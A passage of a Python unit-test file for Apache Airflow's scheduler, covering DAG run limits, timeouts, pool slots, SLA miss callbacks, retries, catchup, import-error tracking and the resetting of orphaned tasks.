    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    # first run is allowed ...
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # ... second is blocked by max_active_runs=1
    dr = scheduler.create_dag_run(dag)
    self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
    """
    Test if a dagrun will be set failed if timeout
    """
    dag = DAG(
        dag_id='test_scheduler_fail_dagrun_timeout',
        start_date=DEFAULT_DATE)
    dag.dagrun_timeout = datetime.timedelta(seconds=60)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # push the run's start_date well past dagrun_timeout
    dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
    session.merge(dr)
    session.commit()
    # creating the next run must fail the timed-out one
    dr2 = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr2)
    dr.refresh_from_db(session=session)
    self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
    """
    Test if a dagrun will not be scheduled if max_dag_runs
    has been reached and dagrun_timeout is not reached

    Test if a dagrun will be scheduled if max_dag_runs has
    been reached but dagrun_timeout is also reached
    """
    dag = DAG(
        dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 1
    dag.dagrun_timeout = datetime.timedelta(seconds=60)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # Should not be scheduled as DagRun has not timedout and max_active_runs is reached
    new_dr = scheduler.create_dag_run(dag)
    self.assertIsNone(new_dr)
    # Should be scheduled as dagrun_timeout has passed
    dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
    session.merge(dr)
    session.commit()
    new_dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
    """
    Test if _process_task_instances only schedules ti's up to max_active_runs
    (related to issue AIRFLOW-137)
    """
    dag = DAG(
        dag_id='test_scheduler_max_active_runs_respected_after_clear',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 3
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    # First create up to 3 dagruns in RUNNING state.
    scheduler.create_dag_run(dag)
    # Reduce max_active_runs to 1
    dag.max_active_runs = 1
    queue = Mock()
    # and schedule them in, so we can check how many
    # tasks are put on the queue (should be one, not 3)
    scheduler._process_task_instances(dag, queue=queue)
    queue.append.assert_called_with(
        (dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
    )
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
    """
    Test task instances not queued when pool is full
    """
    # pool_full is patched False so _process_task_instances enqueues freely;
    # the 1-slot pool is enforced later by _execute_task_instances
    mock_pool_full.return_value = False
    dag = DAG(
        dag_id='test_scheduler_verify_pool_full',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow',
        pool='test_scheduler_verify_pool_full')
    session = settings.Session()
    pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
    session.add(pool)
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    # Create 2 dagruns, which will create 2 task instances.
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    self.assertEqual(dr.execution_date, DEFAULT_DATE)
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    queue = []
    scheduler._process_task_instances(dag, queue=queue)
    self.assertEqual(len(queue), 2)
    dagbag = self._make_simple_dag_bag([dag])
    # Recreated part of the scheduler here, to kick off tasks -> executor
    for ti_key in queue:
        task = dag.get_task(ti_key[1])
        ti = TI(task, ti_key[2])
        # Task starts out in the scheduled state. All tasks in the
        # scheduled state will be sent to the executor
        ti.state = State.SCHEDULED
        # Also save this task instance to the DB.
        session.merge(ti)
        session.commit()
    scheduler._execute_task_instances(dagbag,
                                      (State.SCHEDULED,
                                       State.UP_FOR_RETRY))
    # only one slot in the pool -> only one of the two TIs gets queued
    self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
    """
    Test if the schedule_interval will be auto aligned with the start_date
    such that if the start_date coincides with the schedule the first
    execution_date will be start_date, otherwise it will be start_date +
    interval.
    """
    dag = DAG(
        dag_id='test_scheduler_auto_align_1',
        start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
        schedule_interval="4 5 * * *"
    )
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # start_date does not fall on the cron schedule -> first run is the
    # next schedule point after start_date
    self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
    dag = DAG(
        dag_id='test_scheduler_auto_align_2',
        start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
        schedule_interval="10 10 * * *"
    )
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # start_date coincides with the cron schedule -> first run is start_date
    self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
    """
    Checks if tasks that are not taken up by the executor
    get rescheduled
    """
    executor = TestExecutor()
    dagbag = DagBag(executor=executor)
    dagbag.dags.clear()
    dagbag.executor = executor
    dag = DAG(
        dag_id='test_scheduler_reschedule',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    dag.clear()
    dag.is_subdag = False
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()
    dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)

    # patch DagBag so the scheduler sees only the DAG bagged above
    @mock.patch('airflow.models.DagBag', return_value=dagbag)
    @mock.patch('airflow.models.DagBag.collect_dags')
    def do_schedule(function, function2):
        # Use a empty file since the above mock will return the
        # expected DAGs. Also specify only a single file so that it doesn't
        # try to schedule the above DAG repeatedly.
        scheduler = SchedulerJob(num_runs=1,
                                 executor=executor,
                                 subdir=os.path.join(settings.DAGS_FOLDER,
                                                     "no_dags.py"))
        scheduler.heartrate = 0
        scheduler.run()

    do_schedule()
    self.assertEqual(1, len(executor.queued_tasks))
    # the executor never ran the task; clearing its queue simulates the
    # task being dropped, so the next loop must re-queue it
    executor.queued_tasks.clear()
    do_schedule()
    self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
    """
    Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
    """
    session = settings.Session()
    # Mock the callback function so we can verify that it was not called
    sla_callback = MagicMock()
    # Create dag with a start of 2 days ago, but an sla of 1 day
    # ago so we'll already have an sla_miss on the books
    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              sla_miss_callback=sla_callback,
              default_args={'start_date': test_start_date,
                            'sla': datetime.timedelta(days=1)})
    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow')
    # Create a TaskInstance for two days ago
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state='success'))
    # Create an SlaMiss where notification was sent, but email was not
    session.merge(SlaMiss(task_id='dummy',
                          dag_id='test_sla_miss',
                          execution_date=test_start_date,
                          email_sent=False,
                          notification_sent=True))
    # Now call manage_slas and see if the sla_miss callback gets called
    scheduler = SchedulerJob(dag_id='test_sla_miss',
                             num_runs=1)
    scheduler.manage_slas(dag=dag, session=session)
    sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
    """
    Test that the scheduler gracefully logs an exception if there is a problem
    calling the sla_miss_callback
    """
    session = settings.Session()
    sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              sla_miss_callback=sla_callback,
              default_args={'start_date': test_start_date})
    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow',
                         sla=datetime.timedelta(hours=1))
    # BUG FIX: state was the literal 'Success' (capitalized), which does not
    # equal State.SUCCESS ('success') used by the rest of this suite; use the
    # canonical constant so the TI is actually recognized as finished.
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state=State.SUCCESS))
    # Create an SlaMiss where notification was sent, but email was not
    session.merge(SlaMiss(task_id='dummy',
                          dag_id='test_sla_miss',
                          execution_date=test_start_date))
    # Now call manage_slas and see if the sla_miss callback gets called
    scheduler = SchedulerJob(dag_id='test_sla_miss')
    with mock.patch('airflow.jobs.SchedulerJob.log',
                    new_callable=PropertyMock) as mock_log:
        scheduler.manage_slas(dag=dag, session=session)
        sla_callback.assert_called()
        mock_log().exception.assert_called_with(
            'Could not call sla_miss_callback for DAG %s',
            'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
    """
    Test that the scheduler gracefully logs an exception if there is a problem
    sending an email
    """
    session = settings.Session()
    # Mock the callback function so we can verify that it was not called
    mock_send_email.side_effect = RuntimeError('Could not send an email')
    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              default_args={'start_date': test_start_date,
                            'sla': datetime.timedelta(days=1)})
    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow',
                         email='test@test.com',
                         sla=datetime.timedelta(hours=1))
    # BUG FIX: state was the literal 'Success' (capitalized), which does not
    # equal State.SUCCESS ('success') used by the rest of this suite; use the
    # canonical constant so the TI is actually recognized as finished.
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state=State.SUCCESS))
    # Create an SlaMiss where notification was sent, but email was not
    session.merge(SlaMiss(task_id='dummy',
                          dag_id='test_sla_miss',
                          execution_date=test_start_date))
    scheduler = SchedulerJob(dag_id='test_sla_miss',
                             num_runs=1)
    with mock.patch('airflow.jobs.SchedulerJob.log',
                    new_callable=PropertyMock) as mock_log:
        scheduler.manage_slas(dag=dag, session=session)
        mock_log().exception.assert_called_with(
            'Could not send SLA Miss email notification for DAG %s',
            'test_sla_miss')
def test_retry_still_in_executor(self):
    """
    Checks if the scheduler does not put a task in limbo, when a task is retried
    but is still present in the executor.
    """
    executor = TestExecutor()
    dagbag = DagBag(executor=executor)
    dagbag.dags.clear()
    dagbag.executor = executor
    dag = DAG(
        dag_id='test_retry_still_in_executor',
        start_date=DEFAULT_DATE,
        schedule_interval="@once")
    dag_task1 = BashOperator(
        task_id='test_retry_handling_op',
        bash_command='exit 1',
        retries=1,
        dag=dag,
        owner='airflow')
    dag.clear()
    dag.is_subdag = False
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()
    dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)

    # patch DagBag so the scheduler sees only the DAG bagged above
    @mock.patch('airflow.models.DagBag', return_value=dagbag)
    @mock.patch('airflow.models.DagBag.collect_dags')
    def do_schedule(function, function2):
        # Use a empty file since the above mock will return the
        # expected DAGs. Also specify only a single file so that it doesn't
        # try to schedule the above DAG repeatedly.
        scheduler = SchedulerJob(num_runs=1,
                                 executor=executor,
                                 subdir=os.path.join(settings.DAGS_FOLDER,
                                                     "no_dags.py"))
        scheduler.heartrate = 0
        scheduler.run()

    do_schedule()
    self.assertEqual(1, len(executor.queued_tasks))

    def run_with_error(task):
        # run the TI, swallowing the expected failure of `exit 1`
        try:
            task.run()
        except AirflowException:
            pass

    ti_tuple = six.next(six.itervalues(executor.queued_tasks))
    (command, priority, queue, simple_ti) = ti_tuple
    ti = simple_ti.construct_task_instance()
    ti.task = dag_task1
    self.assertEqual(ti.try_number, 1)
    # fail execution
    run_with_error(ti)
    self.assertEqual(ti.state, State.UP_FOR_RETRY)
    self.assertEqual(ti.try_number, 2)
    ti.refresh_from_db(lock_for_update=True, session=session)
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()
    # do not schedule
    do_schedule()
    self.assertTrue(executor.has_task(ti))
    ti.refresh_from_db()
    # removing self.assertEqual(ti.state, State.SCHEDULED)
    # as scheduler will move state from SCHEDULED to QUEUED
    # now the executor has cleared and it should be allowed the re-queue,
    # but tasks stay in the executor.queued_tasks after executor.heartbeat()
    # will be set back to SCHEDULED state
    executor.queued_tasks.clear()
    do_schedule()
    ti.refresh_from_db()
    self.assertEqual(ti.state, State.SCHEDULED)
    # To verify that task does get re-queued.
    executor.queued_tasks.clear()
    executor.do_update = True
    do_schedule()
    ti.refresh_from_db()
    self.assertEqual(ti.state, State.RUNNING)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
    """
    Integration test of the scheduler not accidentally resetting
    the try_numbers for a task
    """
    dag = self.dagbag.get_dag('test_retry_handling_job')
    dag_task1 = dag.get_task("test_retry_handling_op")
    dag.clear()
    scheduler = SchedulerJob(dag_id=dag.dag_id,
                             num_runs=1)
    scheduler.heartrate = 0
    scheduler.run()
    session = settings.Session()
    ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
                                  TI.task_id == dag_task1.task_id).first()
    # make sure the counter has increased
    self.assertEqual(ti.try_number, 2)
    self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_dag_with_system_exit(self):
    """
    Test to check that a DAG with a system.exit() doesn't break the scheduler.
    """
    dag_id = 'exit_test_dag'
    dag_ids = [dag_id]
    dag_directory = os.path.join(settings.DAGS_FOLDER,
                                 "..",
                                 "dags_with_system_exit")
    dag_file = os.path.join(dag_directory,
                            'b_test_scheduler_dags.py')

    dagbag = DagBag(dag_folder=dag_file)
    for dag_id in dag_ids:
        dag = dagbag.get_dag(dag_id)
        dag.clear()

    # One scheduler pass over the whole directory; it must survive the
    # sibling DAG file that calls sys.exit() during parsing.
    scheduler = SchedulerJob(dag_ids=dag_ids,
                             subdir=dag_directory,
                             num_runs=1)
    scheduler.run()
    with create_session() as session:
        # The well-behaved DAG should still have produced one task instance.
        self.assertEqual(
            len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
    """
    Test to check that a DAG returns its active runs
    """
    now = timezone.utcnow()
    six_hours_ago_to_the_hour = \
        (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
    START_DATE = six_hours_ago_to_the_hour
    DAG_NAME1 = 'get_active_runs_test'

    default_args = {
        'owner': 'airflow',
        'depends_on_past': False,
        'start_date': START_DATE
    }
    dag1 = DAG(DAG_NAME1,
               schedule_interval='* * * * *',
               max_active_runs=1,
               default_args=default_args
               )

    # Three chained dummy tasks: run_this_1 -> run_this_2 -> run_this_3.
    run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
    run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
    run_this_2.set_upstream(run_this_1)
    run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
    run_this_3.set_upstream(run_this_2)

    # Register the DAG in the metadata DB so the scheduler can create runs.
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag1.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()

    scheduler = SchedulerJob()
    dag1.clear()

    dr = scheduler.create_dag_run(dag1)

    # We had better get a dag run
    self.assertIsNotNone(dr)

    execution_date = dr.execution_date

    running_dates = dag1.get_active_runs()

    try:
        running_date = running_dates[0]
    except Exception:
        # Sentinel so the assertion below fails with a clear message instead
        # of an IndexError when no runs are reported active.
        running_date = 'Except'

    self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
    """
    Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
    """

    def setup_dag(dag_id, schedule_interval, start_date, catchup):
        # Helper: build a three-task chained DAG and register it in the
        # metadata DB so the scheduler can create runs for it.
        default_args = {
            'owner': 'airflow',
            'depends_on_past': False,
            'start_date': start_date
        }
        dag = DAG(dag_id,
                  schedule_interval=schedule_interval,
                  max_active_runs=1,
                  catchup=catchup,
                  default_args=default_args)

        t1 = DummyOperator(task_id='t1', dag=dag)
        t2 = DummyOperator(task_id='t2', dag=dag)
        t2.set_upstream(t1)
        t3 = DummyOperator(task_id='t3', dag=dag)
        t3.set_upstream(t2)

        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        return dag

    now = timezone.utcnow()
    six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
        minute=0, second=0, microsecond=0)
    half_an_hour_ago = now - datetime.timedelta(minutes=30)
    two_hours_ago = now - datetime.timedelta(hours=2)

    scheduler = SchedulerJob()

    # With catchup=True (also the configured default) nothing special to
    # schedule here; just verify the flags.
    dag1 = setup_dag(dag_id='dag_with_catchup',
                     schedule_interval='* * * * *',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=True)
    default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
    self.assertEqual(default_catchup, True)
    self.assertEqual(dag1.catchup, True)

    dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
                     schedule_interval='*/10 * * * *',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag2)
    # We had better get a dag run
    self.assertIsNotNone(dr)
    # The DR should be scheduled in the last half an hour, not 6 hours ago
    self.assertGreater(dr.execution_date, half_an_hour_ago)
    # The DR should be scheduled BEFORE now
    self.assertLess(dr.execution_date, timezone.utcnow())

    dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
                     schedule_interval='@hourly',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag3)
    # We had better get a dag run
    self.assertIsNotNone(dr)
    # The DR should be scheduled in the last 2 hours, not 6 hours ago
    self.assertGreater(dr.execution_date, two_hours_ago)
    # The DR should be scheduled BEFORE now
    self.assertLess(dr.execution_date, timezone.utcnow())

    dag4 = setup_dag(dag_id='dag_without_catchup_once',
                     schedule_interval='@once',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag4)
    self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
    """An unparseable DAG file that exists before the scheduler starts is
    recorded as exactly one ImportError row with the parse failure."""
    dags_folder = mkdtemp()
    try:
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    with create_session() as session:
        import_errors = session.query(errors.ImportError).all()

        self.assertEqual(len(import_errors), 1)
        import_error = import_errors[0]
        self.assertEqual(import_error.filename,
                         unparseable_filename)
        self.assertEqual(import_error.stacktrace,
                         "invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
    """An unparseable DAG file added after a scheduler loop has already run
    is picked up on the next loop and recorded as one ImportError row."""
    dags_folder = mkdtemp()
    try:
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        # First loop runs against an empty folder; the bad file arrives later.
        self.run_single_scheduler_loop_with_no_dags(dags_folder)

        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    with create_session() as session:
        import_errors = session.query(errors.ImportError).all()

        self.assertEqual(len(import_errors), 1)
        import_error = import_errors[0]
        self.assertEqual(import_error.filename,
                         unparseable_filename)
        self.assertEqual(import_error.stacktrace,
                         "invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
    """A syntactically valid DAG file produces no ImportError rows."""
    try:
        dags_folder = mkdtemp()
        parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)

        with open(parseable_filename, 'w') as parseable_file:
            parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    with create_session() as session:
        import_errors = session.query(errors.ImportError).all()

        self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
    """Re-parsing a file whose error moved replaces the stored ImportError
    row instead of accumulating a second one."""
    try:
        dags_folder = mkdtemp()
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)

        # Generate original import error
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)

        # Generate replacement import error (the error will be on the second line now)
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(
                PARSEABLE_DAG_FILE_CONTENTS +
                os.linesep +
                UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    session = settings.Session()
    import_errors = session.query(errors.ImportError).all()

    self.assertEqual(len(import_errors), 1)
    import_error = import_errors[0]
    self.assertEqual(import_error.filename,
                     unparseable_filename)
    # Line 2 confirms the stacktrace was refreshed, not the stale line-1 one.
    self.assertEqual(import_error.stacktrace,
                     "invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
    """Fixing the syntax error in a DAG file clears its ImportError row on
    the next scheduler loop."""
    try:
        dags_folder = mkdtemp()
        filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)

        # Generate original import error
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)

        # Remove the import error from the file
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(
                PARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    session = settings.Session()
    import_errors = session.query(errors.ImportError).all()

    self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
    """Deleting a previously-unparseable DAG file clears its ImportError row
    on the next scheduler loop."""
    try:
        dags_folder = mkdtemp()
        filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)

        # Generate original import error
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)

    # Rerun the scheduler once the dag file has been removed
    self.run_single_scheduler_loop_with_no_dags(dags_folder)

    with create_session() as session:
        import_errors = session.query(errors.ImportError).all()

        self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
    """
    [JIRA-1357] Test the 'list_py_file_paths' function used by the
    scheduler to list and load DAGs.
    """
    detected_files = set()
    expected_files = set()
    # No_dags is empty, _invalid_ is ignored by .airflowignore
    ignored_files = [
        'no_dags.py',
        'test_invalid_cron.py',
        'test_zip_invalid_cron.zip',
    ]
    for file_name in os.listdir(TEST_DAGS_FOLDER):
        if file_name.endswith('.py') or file_name.endswith('.zip'):
            if file_name not in ignored_files:
                expected_files.add(
                    '{}/{}'.format(TEST_DAGS_FOLDER, file_name))
    for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
        detected_files.add(file_path)
    self.assertEqual(detected_files, expected_files)

    # Second pass: with include_examples=True the bundled example DAGs
    # (everything but __init__.py) must also be reported.
    example_dag_folder = airflow.example_dags.__path__[0]
    for root, dirs, files in os.walk(example_dag_folder):
        for file_name in files:
            if file_name.endswith('.py') or file_name.endswith('.zip'):
                if file_name not in ['__init__.py']:
                    expected_files.add(os.path.join(root, file_name))
    detected_files.clear()
    for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
        detected_files.add(file_path)
    self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
    """Try with nothing. """
    scheduler = SchedulerJob()
    session = settings.Session()
    # With an empty database there is nothing to reset.
    self.assertEqual(
        0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
    """An orphaned SCHEDULED task in an externally-triggered running dagrun
    is still reset."""
    dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag, session=session)
    ti = dr1.get_task_instances(session=session)[0]
    dr1.state = State.RUNNING
    ti.state = State.SCHEDULED
    dr1.external_trigger = True
    session.merge(ti)
    session.merge(dr1)
    session.commit()

    reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
    self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
    """Tasks belonging to a backfill dagrun must never be reset."""
    dag_id = 'test_reset_orphaned_tasks_backfill_dag'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag, session=session)
    ti = dr1.get_task_instances(session=session)[0]
    ti.state = State.SCHEDULED
    dr1.state = State.RUNNING
    # A run_id with the backfill prefix marks the run as a backfill.
    dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
    session.merge(ti)
    session.merge(dr1)
    session.commit()

    self.assertTrue(dr1.is_backfill)
    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
    """Try to reset when we specify a dagrun and ensure nothing else is."""
    dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()
    # make two dagruns, only reset for one
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr1.state = State.SUCCESS
    dr2.state = State.RUNNING
    ti1 = dr1.get_task_instances(session=session)[0]
    ti2 = dr2.get_task_instances(session=session)[0]
    ti1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED

    session.merge(ti1)
    session.merge(ti2)
    session.merge(dr1)
    session.merge(dr2)
    session.commit()

    reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
    self.assertEqual(1, len(reset_tis))

    ti1.refresh_from_db(session=session)
    ti2.refresh_from_db(session=session)
    # Only the task in the filtered dagrun (dr2) was reset to NONE.
    self.assertEqual(State.SCHEDULED, ti1.state)
    self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
    """Make sure a task in an orphaned state is not reset if it has no dagrun. """
    dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    task = DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    # Create the task instance directly, bypassing dagrun creation.
    ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
    session.add(ti)
    session.commit()

    ti.refresh_from_db()
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()

    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
    """A RUNNING task in a running dagrun is not an orphan and stays RUNNING."""
    dag_id = 'test_reset_orphaned_tasks_no_orphans'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    dr1.state = State.RUNNING
    tis = dr1.get_task_instances(session=session)
    tis[0].state = State.RUNNING
    session.merge(dr1)
    session.merge(tis[0])
    session.commit()

    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
    tis[0].refresh_from_db()
    self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
    """Ensure orphaned tasks with non-running dagruns are not reset."""
